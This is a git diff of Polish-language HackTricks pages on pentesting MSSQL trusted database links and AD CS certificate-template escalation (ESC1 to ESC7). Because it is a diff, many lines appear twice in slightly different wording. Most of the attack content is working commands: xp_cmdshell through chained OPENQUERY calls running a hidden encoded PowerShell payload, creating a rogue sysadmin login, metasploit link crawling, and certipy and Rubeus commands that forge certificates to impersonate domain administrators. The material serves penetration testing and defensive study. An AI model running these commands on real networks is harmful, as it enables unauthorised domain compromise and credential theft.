* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**repozytorium hacktricks**](https://github.com/carlospolop/hacktricks) **i** [**repozytorium hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## **Eksploracja / Odkrywanie MSSQL**
Moduł powershell [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) jest bardzo przydatny w tym przypadku.
@ -79,9 +78,17 @@ Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResu
```
### Podstawowe sztuczki hakowania MSSQL
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
{% endcontent-ref %}
## Zaufane łącza MSSQL
Jeśli instancja MSSQL jest zaufana (łącze bazy danych) przez inną instancję MSSQL. Jeśli użytkownik ma uprawnienia do zaufanej bazy danych, będzie mógł **wykorzystać relację zaufania do wykonywania zapytań również w innej instancji**. Te zaufania mogą być łańcuchowane, a w pewnym momencie użytkownik może znaleźć źle skonfigurowaną bazę danych, w której może wykonywać polecenia.
**Połączenia między bazami danych działają nawet w przypadku zaufań lasów.**
**Łącza między bazami danych działają nawet w przypadku zaufań między lasami.**
### Nadużycie Powershell
```powershell
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
@ -121,17 +128,15 @@ Możesz łatwo sprawdzić zaufane linki za pomocą metasploita.
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
Zauważ, że metasploit będzie próbował nadużyć tylko funkcji `openquery()` w MSSQL (więc jeśli nie możesz wykonać polecenia za pomocą `openquery()`, będziesz musiał spróbować metody `EXECUTE` **ręcznie** aby wykonać polecenia, zobacz więcej poniżej.)
### Ręcznie - Openquery()
Z **Linuxa** możesz uzyskać konsolę MSSQL za pomocą **sqsh** i **mssqlclient.py.**
Z systemu **Linux** możesz uzyskać konsolę powłoki MSSQL za pomocą **sqsh** i **mssqlclient.py.**
Z **Windows** możesz również znaleźć linki i wykonywać polecenia ręcznie za pomocą **klienta MSSQL, takiego jak** [**HeidiSQL**](https://www.heidisql.com)
Z systemu **Windows** możesz również znaleźć linki i wykonywać polecenia ręcznie, korzystając z klienta MSSQL, takiego jak [**HeidiSQL**](https://www.heidisql.com)
_Zaloguj się za pomocą uwierzytelnienia systemu Windows:_
_Zaloguj się, korzystając z uwierzytelniania systemu Windows:_
![](<../../.gitbook/assets/image (805).png>)
![](<../../.gitbook/assets/image (805).png>)
#### Znajdź godne zaufania linki
```sql
@ -140,19 +145,19 @@ EXEC sp_linkedservers;
```
![](<../../.gitbook/assets/image (713).png>)
#### Wykonaj zapytania w zaufanym łączu
#### Wykonaj zapytania w zaufanym linku
Wykonaj zapytania poprzez łącze (przykład: znajdź więcej łączy w nowej dostępnej instancji):
Wykonaj zapytania poprzez link (przykład: znajdź więcej linków w nowej dostępnej instancji):
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
Sprawdź, gdzie używane cudzysłowy podwójne i pojedyncze, ważne jest, aby używać ich w ten sposób.
Sprawdź, gdzie używane cudzysłowy podwójne i pojedyncze, ważne jest, aby używać ich w ten sposób.
{% endhint %}
![](<../../.gitbook/assets/image (640).png>)
Możesz kontynuować tę łańcuchową listę zaufanych linków w nieskończoność ręcznie.
Możesz kontynuować tę zaufaną łańcuchową linków w nieskończoność ręcznie.
```sql
# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
@ -162,7 +167,7 @@ SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", '
```
### Instrukcja - EXECUTE
Możesz także nadużyć zaufanych łączy za pomocą metody `EXECUTE`:
Możesz także nadużywać zaufanych łączy za pomocą metody `EXECUTE`:
```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
@ -170,13 +175,13 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
```
## Eskalacja uprawnień lokalnych
**Lokalny użytkownik MSSQL** zazwyczaj ma specjalny rodzaj uprawnienia o nazwie **`SeImpersonatePrivilege`**. Pozwala to na "podszycie się pod klienta po uwierzytelnieniu".
Użytkownik lokalny **MSSQL** zazwyczaj ma specjalny rodzaj uprawnienia o nazwie **`SeImpersonatePrivilege`**. Pozwala to na "podszycie się pod klienta po uwierzytelnieniu".
Strategią, którą wielu autorów wymyśliło, jest zmuszenie usługi SYSTEM do uwierzytelnienia się w fałszywej usłudze stworzonej przez atakującego. Ta fałszywa usługa jest w stanie podszycić się pod usługę SYSTEM podczas próby uwierzytelnienia.
Strategią, którą wielu autorów wymyśliło, jest zmuszenie usługi SYSTEM do uwierzytelnienia się w fałszywej usłudze lub usłudze typu man-in-the-middle, którą tworzy atakujący. Ta fałszywa usługa jest w stanie podszycić się pod usługę SYSTEM podczas próby uwierzytelnienia.
[SweetPotato](https://github.com/CCob/SweetPotato) zawiera zbiór różnych technik, które można wykonać za pomocą polecenia `execute-assembly` w Beacon.
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -184,7 +189,7 @@ Strategią, którą wielu autorów wymyśliło, jest zmuszenie usługi SYSTEM do
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**

150
windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
View file

@ -1,4 +1,4 @@
# Eskalacja domeny AD CS
# AD CS Eskalacja domeny
<details>
@ -10,11 +10,11 @@ Inne sposoby wsparcia HackTricks:
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na GitHubie.
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -28,7 +28,7 @@ Inne sposoby wsparcia HackTricks:
### Wyjaśnienie
### Błędnie skonfigurowane szablony certyfikatów - ESC1 Wyjaśnione
### Wyjaśnienie błędnie skonfigurowanych szablonów certyfikatów - ESC1
* **Prawa do zapisu są przyznawane nisko uprzywilejowanym użytkownikom przez Enterprise CA.**
* **Zgoda menedżera nie jest wymagana.**
@ -37,7 +37,7 @@ Inne sposoby wsparcia HackTricks:
* **Szablony certyfikatów są skonfigurowane tak, aby definiować EKU ułatwiające uwierzytelnianie:**
* Identyfikatory Extended Key Usage (EKU) takie jak Client Authentication (OID 1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (1.3.6.1.5.2.3.4), Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2), Any Purpose (OID 2.5.29.37.0) lub brak EKU (SubCA) są uwzględnione.
* **Możliwość dołączenia subjectAltName w żądaniu podpisania certyfikatu (CSR) jest dozwolona przez szablon:**
* Active Directory (AD) priorytetowo traktuje subjectAltName (SAN) w certyfikacie do weryfikacji tożsamości, jeśli jest obecny. Oznacza to, że poprzez określenie SAN w CSR, certyfikat można żądać w celu podszywania się za dowolnego użytkownika (np. administratora domeny). Czy żądający może określić SAN jest wskazane w obiekcie AD szablonu certyfikatu za pomocą właściwości `mspki-certificate-name-flag`. Ta właściwość jest maską bitową, a obecność flagi `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` pozwala na określenie SAN przez żądającego.
* Katalog Active Directory (AD) priorytetowo traktuje subjectAltName (SAN) w certyfikacie do weryfikacji tożsamości, jeśli jest obecny. Oznacza to, że poprzez określenie SAN w CSR, certyfikat można zażądać w celu podszywania się pod dowolnego użytkownika (np. administratora domeny). Czy żądający może określić SAN jest wskazane w obiekcie AD szablonu certyfikatu za pomocą właściwości `mspki-certificate-name-flag`. Ta właściwość jest bitem maski, a obecność flagi `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` pozwala na określenie SAN przez żądającego.
{% hint style="danger" %}
Konfiguracja ta pozwala nisko uprzywilejowanym użytkownikom żądać certyfikatów z dowolnym SAN wyborem, umożliwiając uwierzytelnianie jako dowolny podmiot domeny za pośrednictwem Kerberos lub SChannel.
@ -45,7 +45,7 @@ Konfiguracja ta pozwala nisko uprzywilejowanym użytkownikom żądać certyfikat
Ta funkcja jest czasami włączana w celu wsparcia generowania certyfikatów HTTPS lub hosta na żywo przez produkty lub usługi wdrożeniowe, lub z powodu braku zrozumienia.
Zauważono, że utworzenie certyfikatu z tą opcją powoduje ostrzeżenie, czego nie ma w przypadku duplikowania istniejącego szablonu certyfikatu (takiego jak szablon `WebServer`, który ma włączoną `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`) i następnie zmodyfikowania go w celu uwzględnienia OID uwierzytelniania.
Zauważono, że utworzenie certyfikatu z tą opcją powoduje ostrzeżenie, czego nie ma w przypadku duplikowania istniejącego szablonu certyfikatu (takiego jak szablon `WebServer`, który ma włączone `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`) i następnie zmodyfikowania go w celu uwzględnienia OID uwierzytelniania.
### Nadużycie
@ -66,7 +66,7 @@ certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.lo
```
Windows binaries "Certreq.exe" & "Certutil.exe" można użyć do wygenerowania pliku PFX: https://gist.github.com/b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee
Wyliczenie szablonów certyfikatów w schemacie konfiguracji AD Forest, w szczególności tych nie wymagających zatwierdzenia ani podpisów, posiadających uwierzytelnienie klienta lub EKU logowania kartą inteligentną, oraz z włączoną flagą `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`, można przeprowadzić, uruchamiając następujące zapytanie LDAP:
Wyliczenie szablonów certyfikatów w schemacie konfiguracji AD Forest, w szczególności tych nie wymagających zatwierdzenia ani podpisów, posiadających uwierzytelnianie klienta lub EKU logowania kartą inteligentną, oraz z włączoną flagą `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`, można przeprowadzić, uruchamiając następujące zapytanie LDAP:
```
(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4)(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*)))(mspkicertificate-name-flag:1.2.840.113556.1.4.804:=1))
```
@ -82,39 +82,39 @@ Drugi scenariusz nadużycia to wariacja pierwszego:
4. Nadmiernie liberalny deskryptor zabezpieczeń na szablonie certyfikatu przyznaje uprawnienia do zapisywania certyfikatów nisko uprzywilejowanym użytkownikom.
5. **Szablon certyfikatu jest zdefiniowany tak, aby zawierał dowolny cel EKU lub brak EKU.**
**Dowolny cel EKU** pozwala na uzyskanie certyfikatu przez atakującego do **dowolnego celu**, w tym uwierzytelniania klienta, uwierzytelniania serwera, podpisywania kodu, itp. Ta sama **technika używana w ESC3** może być wykorzystana do wykorzystania tego scenariusza.
**Dowolny cel EKU** pozwala na uzyskanie certyfikatu przez atakującego do **dowolnego celu**, w tym uwierzytelniania klienta, uwierzytelniania serwera, podpisywania kodu, itp. Ta sama **technika używana w przypadku ESC3** może być wykorzystana do wykorzystania tego scenariusza.
Certyfikaty **bez EKU**, które działają jako certyfikaty podrzędne CA, mogą być wykorzystane do **dowolnego celu** i mogą **również służyć do podpisywania nowych certyfikatów**. Dlatego atakujący mógłby określić dowolne EKU lub pola w nowych certyfikatach, korzystając z certyfikatu podrzędnego CA.
Jednakże nowe certyfikaty utworzone do **uwierzytelniania domeny** nie będą działać, jeśli certyfikat podrzędny CA nie jest zaufany przez obiekt **`NTAuthCertificates`**, co jest domyślnym ustawieniem. Niemniej jednak, atakujący nadal może tworzyć **nowe certyfikaty z dowolnym EKU** i arbitralnymi wartościami certyfikatu. Mogą one potencjalnie **być wykorzystane** do szerokiego zakresu celów (np. podpisywania kodu, uwierzytelniania serwera, itp.) i mogą mieć znaczące implikacje dla innych aplikacji w sieci, takich jak SAML, AD FS, czy IPSec.
Jednakże nowe certyfikaty utworzone do **uwierzytelniania domeny** nie będą działać, jeśli certyfikat podrzędny CA nie jest zaufany przez obiekt **`NTAuthCertificates`**, co jest ustawieniem domyślnym. Niemniej jednak, atakujący nadal może tworzyć **nowe certyfikaty z dowolnym EKU** i arbitralnymi wartościami certyfikatu. Mogą one potencjalnie **być wykorzystane** do szerokiego zakresu celów (np. podpisywania kodu, uwierzytelniania serwera, itp.) i mogą mieć znaczące implikacje dla innych aplikacji w sieci, takich jak SAML, AD FS, czy IPSec.
Aby wyliczyć szablony pasujące do tego scenariusza w schemacie konfiguracji lasu AD, można uruchomić następujące zapytanie LDAP:
```
(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))
```
## Źle skonfigurowane szablony agenta zapisu - ESC3
## Niewłaściwie skonfigurowane szablony agenta zapisu - ESC3
### Wyjaśnienie
Ten scenariusz jest podobny do pierwszego i drugiego, ale **wykorzystuje** **inne EKU** (Agent żądania certyfikatu) i **2 różne szablony** (co skutkuje 2 zestawami wymagań).
Ten scenariusz jest podobny do pierwszego i drugiego, ale **wykorzystuje** **inne EKU** (Agent żądania certyfikatu) i **2 różne szablony** (dlatego ma 2 zestawy wymagań),
**Agent żądania certyfikatu EKU** (OID 1.3.6.1.4.1.311.20.2.1), znany jako **Agent zapisu** w dokumentacji firmy Microsoft, umożliwia podmiotowi **zapisanie się** na **certyfikat w imieniu innego użytkownika**.
**"Agent zapisu"** zapisuje się w takim **szablonie** i używa wynikowego **certyfikatu do współpodpisywania CSR w imieniu innego użytkownika**. Następnie **wysyła** współpodpisany CSR do CA, zapisując się w **szablonie**, który **pozwala na "zapisanie się w imieniu"**, a CA odpowiada **certyfikatem należącym do "innego" użytkownika**.
**"Agent zapisu"** zapisuje się w takim **szablonie** i używa wynikowego **certyfikatu do współpodpisywania CSR w imieniu innego użytkownika**. Następnie **wysyła** współpodpisany CSR do CA, zapisując się w **szablonie**, który **pozwala na "zapisanie się w imieniu"**, a CA odpowiada certyfikatem należącym do "innego" użytkownika.
**Wymagania 1:**
* Uprawnienia do zapisu są udzielane nisko uprzywilejowanym użytkownikom przez CA przedsiębiorstwa.
* Wymóg zgody menedżera jest pominięty.
* Wymóg zgody menedżera jest pomijany.
* Brak wymogu podpisów autoryzowanych.
* Deskryptor zabezpieczeń szablonu certyfikatu jest nadmiernie przychylny, nadając uprawnienia do zapisu nisko uprzywilejowanym użytkownikom.
* Szablon certyfikatu zawiera EKU agenta żądania certyfikatu, umożliwiając żądanie innych szablonów certyfikatów w imieniu innych podmiotów.
* Deskryptor zabezpieczeń szablonu certyfikatu jest nadmiernie przychylny, udzielając uprawnień do zapisu nisko uprzywilejowanym użytkownikom.
* Szablon certyfikatu zawiera EKU Agent żądania certyfikatu, umożliwiając żądanie innych szablonów certyfikatów w imieniu innych podmiotów.
**Wymagania 2:**
* CA przedsiębiorstwa udziela uprawnień do zapisu nisko uprzywilejowanym użytkownikom.
* Zgoda menedżera jest obejśnięta.
* Wersja schematu szablonu to albo 1, albo przekracza 2, i określa Wymaganie Wydania Polityki Aplikacji, które wymaga EKU agenta żądania certyfikatu.
* Zgoda menedżera jest pomijana.
* Wersja schematu szablonu to albo 1, albo przekracza 2, i określa Wymaganie wydania zasady aplikacji, które wymaga EKU Agent żądania certyfikatu.
* EKU zdefiniowane w szablonie certyfikatu umożliwia uwierzytelnianie domeny.
* Ograniczenia dla agentów zapisu nie są stosowane w CA.
@ -134,15 +134,15 @@ certipy req -username john@corp.local -password Pass0rd! -target-ip ca.corp.loca
# Use Rubeus with the certificate to authenticate as the other user
Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password:asdf
```
**Użytkownicy**, którzy mają prawo **uzyskać** certyfikat **agenta** do rejestracji, szablony, w których **agenta** rejestracji można zarejestrować, oraz **konta**, w imieniu których agent rejestracji może działać, mogą być ograniczone przez przedsiębiorstwo CAs. Można to osiągnąć, otwierając `certsrc.msc` **snap-in**, **klikając prawym przyciskiem myszy na CA**, **klikając Właściwości**, a następnie **przechodząc** do karty "Agenci rejestracji".
**Użytkownicy**, którzy mają prawo **uzyskać** certyfikat **agenta do zapisu**, szablony, w których agenci do zapisu mają prawo do zapisu, oraz **konta**, w imieniu których agent do zapisu może działać, mogą być ograniczeni przez przedsiębiorstwowe CA. Można to osiągnąć, otwierając `certsrc.msc` **snap-in**, **klikając prawym przyciskiem myszy na CA**, **klikając Właściwości**, a następnie **przechodząc** do karty "Agenci do zapisu".
Jednak zauważono, że **domyślne** ustawienie dla CAs to "Nie ograniczaj agentów rejestracji". Gdy ograniczenie agentów rejestracji jest włączone przez administratorów, ustawienie go na "Ogranicz agentów rejestracji", domyślna konfiguracja pozostaje bardzo liberalna. Pozwala to **Wszystkim** uzyskać dostęp do rejestracji we wszystkich szablonach jako ktokolwiek.
Jednakże zauważono, że **domyślne** ustawienie dla CA to "Nie ograniczaj agentów do zapisu". Gdy ograniczenie agentów do zapisu jest włączone przez administratorów, ustawienie go na "Ogranicz agentów do zapisu", domyślna konfiguracja pozostaje bardzo liberalna. Pozwala to **Wszystkim** uzyskać dostęp do zapisu we wszystkich szablonach jako ktokolwiek.
## Narażona kontrola dostępu do szablonu certyfikatu - ESC4
## Kontrola dostępu do szablonu certyfikatu podatna na atak - ESC4
### **Wyjaśnienie**
**Deskryptor zabezpieczeń** na **szablonach certyfikatów** określa **uprawnienia** konkretnych **podmiotów AD** dotyczące szablonu.
**Deskryptor zabezpieczeń** na **szablonach certyfikatów** określa **uprawnienia**, jakie posiadają konkretne **podmioty AD** w odniesieniu do szablonu.
Jeśli **atakujący** posiada wymagane **uprawnienia** do **zmiany** **szablonu** i **wprowadzenia** jakichkolwiek **wykorzystywanych błędów konfiguracyjnych** opisanych w **poprzednich sekcjach**, ułatwione może być eskalacja uprawnień.
@ -150,13 +150,13 @@ Znaczące uprawnienia dotyczące szablonów certyfikatów obejmują:
* **Właściciel:** Zapewnia kontrolę nad obiektem, umożliwiając modyfikację dowolnych atrybutów.
* **Pełna kontrola:** Umożliwia pełną kontrolę nad obiektem, w tym możliwość zmiany dowolnych atrybutów.
* **Zapisz właściciela:** Umożliwia zmianę właściciela obiektu na podmiot znajdujący się pod kontrolą atakującego.
* **ZapiszDacl:** Pozwala na dostosowanie kontroli dostępu, potencjalnie przyznając atakującemu pełną kontrolę.
* **ZapiszWłaściciela:** Pozwala na zmianę właściciela obiektu na podmiot znajdujący się pod kontrolą atakującego.
* **ZapiszDacl:** Umożliwia dostosowanie kontroli dostępu, potencjalnie nadając atakującemu pełną kontrolę.
* **ZapiszWłaściwość:** Uprawnia do edycji dowolnych właściwości obiektu.
### Nadużycie
Przykład privesc jak poprzedni:
Przykład privesc podobny do poprzedniego:
<figure><img src="../../../.gitbook/assets/image (811).png" alt=""><figcaption></figcaption></figure>
@ -166,7 +166,7 @@ Jak widać na powyższej ścieżce, tylko `JOHNPC` ma te uprawnienia, ale nasz u
```bash
certipy shadow auto 'corp.local/john:Passw0rd!@dc.corp.local' -account 'johnpc'
```
**Certipy** może nadpisać konfigurację szablonu certyfikatu za pomocą jednej komendy. Domyślnie Certipy nadpisze konfigurację, aby uczynić ją podatną na ESC1. Możemy również określić parametr `-save-old`, aby zapisać starą konfigurację, co będzie przydatne do przywrócenia konfiguracji po ataku.
**Certipy** może nadpisać konfigurację szablonu certyfikatu za pomocą jednej komendy. Domyślnie Certipy nadpisze konfigurację, aby uczynić ją podatną na ESC1. Możemy także określić parametr `-save-old`, aby zapisać starą konfigurację, co będzie przydatne do przywrócenia konfiguracji po naszym ataku.
```bash
# Make template vuln to ESC1
certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -save-old
@ -177,7 +177,7 @@ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target
# Restore config
certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -configuration ESC4-Test.json
```
## Podatny dostęp do kontroli dostępu do obiektów PKI - ESC5
## Podatny kontrola dostępu do obiektów PKI - ESC5
### Wyjaśnienie
@ -185,7 +185,7 @@ Rozległa sieć powiązań oparta na listach kontroli dostępu (ACL), która obe
* Obiekt komputera AD serwera CA, który może zostać skompromitowany poprzez mechanizmy takie jak S4U2Self lub S4U2Proxy.
* Serwer RPC/DCOM serwera CA.
* Dowolny obiekt potomny AD lub kontener w określonej ścieżce kontenera `CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`. Ta ścieżka obejmuje, ale nie ogranicza się do kontenerów i obiektów takich jak kontener Szablonów Certyfikatów, kontener Certyfikujących Urzędów, obiekt NTAuthCertificates i kontener Usług Enrollments.
* Dowolny obiekt potomny AD lub kontener w określonej ścieżce kontenera `CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`. Ta ścieżka obejmuje, ale nie ogranicza się do, kontenerów i obiektów takich jak kontener Szablonów Certyfikatów, kontener Certyfikujących Urzędów, obiekt NTAuthCertificates i kontener Usług Enroll.
Bezpieczeństwo systemu PKI może zostać naruszone, jeśli nisko uprzywilejowany atakujący zdobędzie kontrolę nad którymkolwiek z tych kluczowych komponentów.
@ -193,9 +193,9 @@ Bezpieczeństwo systemu PKI może zostać naruszone, jeśli nisko uprzywilejowan
### Wyjaśnienie
Temat omawiany w [**poście Akademii CQure**](https://cqureacademy.com/blog/enhanced-key-usage) dotyczy również implikacji flagi **`EDITF_ATTRIBUTESUBJECTALTNAME2`**, jak to opisano w dokumentacji firmy Microsoft. Ta konfiguracja, gdy jest aktywowana na Urzędzie Certyfikacyjnym (CA), pozwala na uwzględnienie **wartości zdefiniowanych przez użytkownika** w **alternatywnej nazwie podmiotu** dla **dowolnego żądania**, w tym tych skonstruowanych z Active Directory®. W rezultacie ta możliwość pozwala **intruzowi** na zapisanie się poprzez **dowolny szablon** ustawiony dla **uwierzytelniania** domeny—szczególnie tych otwartych dla zapisu przez **nieuprzywilejowanych** użytkowników, takich jak standardowy szablon Użytkownika. W rezultacie certyfikat może być zabezpieczony, umożliwiając intruzowi uwierzytelnienie się jako administrator domeny lub **dowolna inna aktywna jednostka** w domenie.
Temat omawiany w [**poście Akademii CQure**](https://cqureacademy.com/blog/enhanced-key-usage) dotyczy również implikacji flagi **`EDITF_ATTRIBUTESUBJECTALTNAME2`**, jak to opisano przez firmę Microsoft. Ta konfiguracja, gdy jest aktywowana na Urzędzie Certyfikacyjnym (CA), pozwala na uwzględnienie **wartości zdefiniowanych przez użytkownika** w **alternatywnej nazwie podmiotu** dla **dowolnego żądania**, w tym tych skonstruowanych z Active Directory®. W rezultacie ta możliwość pozwala **intruzowi** na zapisanie się poprzez **dowolny szablon** ustawiony dla **uwierzytelniania** domeny—szczególnie tych otwartych dla **rejestracji przez użytkowników nieuprzywilejowanych**, takich jak standardowy szablon Użytkownika. W rezultacie certyfikat może być zabezpieczony, umożliwiając intruzowi uwierzytelnienie jako administrator domeny lub **dowolna inna aktywna jednostka** w domenie.
**Uwaga**: Sposób dodawania **alternatywnych nazw** do żądania certyfikatu (CSR), poprzez argument `-attrib "SAN:"` w `certreq.exe` (nazywany „Pary Wartości Nazw”), prezentuje **kontrast** w porównaniu ze strategią eksploatacji SAN w ESC1. Tutaj różnica polega na **enkapsulacji informacji o koncie**—w atrybucie certyfikatu, a nie w rozszerzeniu.
**Uwaga**: Sposób dodawania **alternatywnych nazw** do Wniosku o Wydanie Certyfikatu (CSR), poprzez argument `-attrib "SAN:"` w `certreq.exe` (nazywany „Pary Wartości Nazw”), prezentuje **kontrast** w stosunku do strategii eksploatacji SANów w ESC1. Tutaj różnica polega na **sposobie kapsułkowania informacji o koncie**—w atrybucie certyfikatu, a nie w rozszerzeniu.
### Nadużycie
@ -226,7 +226,7 @@ certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJ
```
{% hint style="warning" %}
Po aktualizacjach zabezpieczeń z maja 2022 r. nowo wydane **certyfikaty** będą zawierać **rozszerzenie zabezpieczeń**, które zawiera **właściwość `objectSid` żądającego**. Dla ESC1 SID ten jest pochodną określonego SAN. Jednakże dla **ESC6** SID odzwierciedla **`objectSid` żądającego**, a nie SAN.\
Aby wykorzystać ESC6, konieczne jest, aby system był podatny na ESC10 (Słabe mapowania certyfikatów), który priorytetowo traktuje **SAN nad nowym rozszerzeniem zabezpieczeń**.
Aby wykorzystać ESC6, konieczne jest, aby system był podatny na ESC10 (Słabe mapowania certyfikatów), które priorytetowo traktuje **SAN nad nowym rozszerzeniem zabezpieczeń**.
{% endhint %}
## Wrażliwa kontrola dostępu do certyfikatu CA - ESC7
@ -235,7 +235,7 @@ Aby wykorzystać ESC6, konieczne jest, aby system był podatny na ESC10 (Słabe
#### Wyjaśnienie
Kontrola dostępu do certyfikatu CA jest utrzymywana poprzez zestaw uprawnień regulujących działania CA. Te uprawnienia można zobaczyć, przechodząc do `certsrv.msc`, klikając prawym przyciskiem CA, wybierając właściwości, a następnie przechodząc do karty Zabezpieczenia. Dodatkowo uprawnienia można wyliczyć za pomocą modułu PSPKI za pomocą poleceń takich jak:
Kontrola dostępu do certyfikatu CA jest utrzymywana poprzez zestaw uprawnień regulujących działania CA. Te uprawnienia można zobaczyć, przechodząc do `certsrv.msc`, klikając prawym przyciskiem myszy na CA, wybierając właściwości, a następnie przechodząc do karty Zabezpieczenia. Dodatkowo uprawnienia można wyliczyć, używając modułu PSPKI za pomocą poleceń takich jak:
```bash
Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
```
